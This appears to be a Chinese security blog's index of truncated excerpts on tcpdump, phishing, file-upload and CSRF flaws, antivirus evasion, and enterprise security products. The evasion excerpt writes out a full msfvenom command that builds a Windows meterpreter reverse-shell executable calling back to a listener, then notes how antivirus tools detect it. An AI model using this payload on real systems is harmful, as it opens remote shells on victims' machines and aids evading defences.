tcpdump采用命令行方式对接口的数据包进行筛选抓取,其丰富特性表现在灵活的表达式上。
不带任何选项的tcpdump,默认会抓取第一个网络接口,且只有将tcpdump进程终止才会停止抓包。例如:
shell> tcpdump -nn -i eth0 icmp
下面是详细的tcpdump用法。
1.1 tcpdump选项
它的……
0x01 Punycode钓鱼攻击
1.1什么是网络钓鱼?
网络钓鱼(Phishing,与钓鱼的英语fishing发音相近,又名钓鱼法或钓鱼式攻击)是通过大量发送声称来自于银行或其他知名机构的欺骗性垃圾邮件,意图引诱收信人给出敏感信息(如用户名、口令、帐号 ID 、 ATM PIN 码或信用卡详细信息)的一种攻击方式。
攻击者利……
File Upload(文件上传)漏洞:
由于对用户上传文件的类型、内容没有进行严格的审查,使得攻击者可以通过上传含有执行脚本的木马文件操纵服务器,因此文件上传漏洞带来的危害常常是毁灭性的。
low级别:
<?phpif( isset( $_POST[ ‘Upload’ ] ) ) {// W……
CSRF跨站点请求伪造(Cross—Site Request Forgery):
跟XSS攻击一样,存在巨大的危害性,你可以这样来理解:攻击者盗用了你的身份,以你的名义发送恶意请求,对服务器来说这个请求是完全合法的,但是却完成了攻击者所期望的一个操作,比如以你的名义发送邮件、发消息,盗取你的账号,添加系统管理员,甚至于购买商品、……
0x01 环境搭建
测试系统:windows10 (1909)
杀毒软件:360安全卫士
在线杀毒:VT
0x02 payload生成
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.129 LPORT=7777 -f exe -o t.exe
原始生成后,完全被查杀
VT查杀55/69
0x03 编码处理
这里使用msf自带的编码器进……
受新型冠状病毒肺炎疫情的影响,多个省市出台规定宣布推迟复工时间,在家远程办公模式成为了众多单位的选择。
远程办公模式在为我们提供方便的同时,也带来了一些问题,安全性就是影响远程办公的重要因素之一。非专用的办公设备、非专用的网络环境,大规模人员的远程办公带来的安全风险成为我们急需关注和解决的……
早几年里,企业的安全运营人员面对机房里的资产管理还能从容应对。如今,如果对资产管理的重视程度和运营方式还停留在以前的水平,迟早会成为黑客的下一个目标。
在网络安全建设的过程中,资产梳理和漏洞运营作为其中的关键环节,常常遇到诸多挑战。
由于内部信息化业务发展迅速,云资产剧增,企业内……
2020年8月19日,第八届互联网安全大会(ISC2020)的安全服务论坛圆满举行。
作为全球网络安全圈的最大盛会之一,ISC大会已举办过14场国际安全领袖峰会,展开超过100次的顶级安全智库对话,已成为全球性的网络安全发展趋势风向标。
安全狗作为国内最早引入云工作负载安全(CWPP)概念,并成功构建相应产品线的专业……
近年来,随着云计算、人工智能、物联网、5G等新技术新起,企业数字化转型使业务暴露范围急剧增加,伴随着黑色产业链向专业化、规模化、智能化方向快速发展,各行各业面临着更多未知的信息安全风险。目前,国内多数用户处于“泛主机”场景,即传统主机环境+内部私有云环境+公有云环境+容器环境(根据业务情况)。笔者将这样的……
网络隔离并不是新的概念,而微隔离技术(Micro-Segmentation)是VMware在应对虚拟化隔离技术时提出来的,但真正让微隔离备受大家关注是从2016年起连续3年微隔离技术都进入Gartner年度安全技术榜单开始。在2016年的Gartner安全与风险管理峰会上, Gartner副总裁、知名分析师Neil MacDonald提出了微隔离技术的概念。“……